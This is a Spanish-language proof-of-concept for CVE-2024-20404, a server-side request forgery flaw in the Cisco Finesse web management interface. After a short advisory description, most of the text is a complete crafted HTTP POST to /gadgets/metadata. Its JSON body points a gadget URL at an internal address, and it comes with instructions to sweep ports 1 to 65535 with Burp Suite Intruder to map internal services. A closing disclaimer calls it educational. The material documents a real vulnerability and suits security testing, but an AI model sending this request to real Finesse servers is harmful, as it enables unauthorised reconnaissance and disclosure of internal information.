
Prueba de concepto del exploit para CVE-2024-20404 que demuestra SSRF en la interfaz de gestión web de Cisco Finesse, permitiendo enumeración de puertos internos y divulgación limitada de información.
Una vulnerabilidad en la interfaz de administración basada en web de Cisco Finesse podría permitir a un atacante remoto no autenticado realizar un ataque SSRF en un sistema afectado.
Esta vulnerabilidad se debe a una validación insuficiente de la entrada proporcionada por el usuario para solicitudes HTTP específicas que se envían a un sistema afectado. Un atacante podría explotar esta vulnerabilidad enviando una solicitud HTTP manipulada al dispositivo afectado. Una explotación exitosa podría permitir al atacante obtener información sensible limitada de los servicios asociados al dispositivo afectado.
<target>.POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

Use el intruder de burp suite para escanear todos los puertos abiertos en el servidor de administración basado en web de Cisco Finesse, cambiando el número de puerto de 1 a 65535.
Verá la respuesta "Connection refused" en los puertos cerrados.


Esto es solo una Prueba de Concepto (PoC) para demostrar que la interfaz de administración basada en web de Cisco Finesse es vulnerable a Server Side Request Forgery (SSRF), y esta PoC es solo con fines educativos. Úsela de manera responsable y solo en sistemas con permiso explícito para realizar pruebas. El mal uso de esta PoC puede tener consecuencias graves.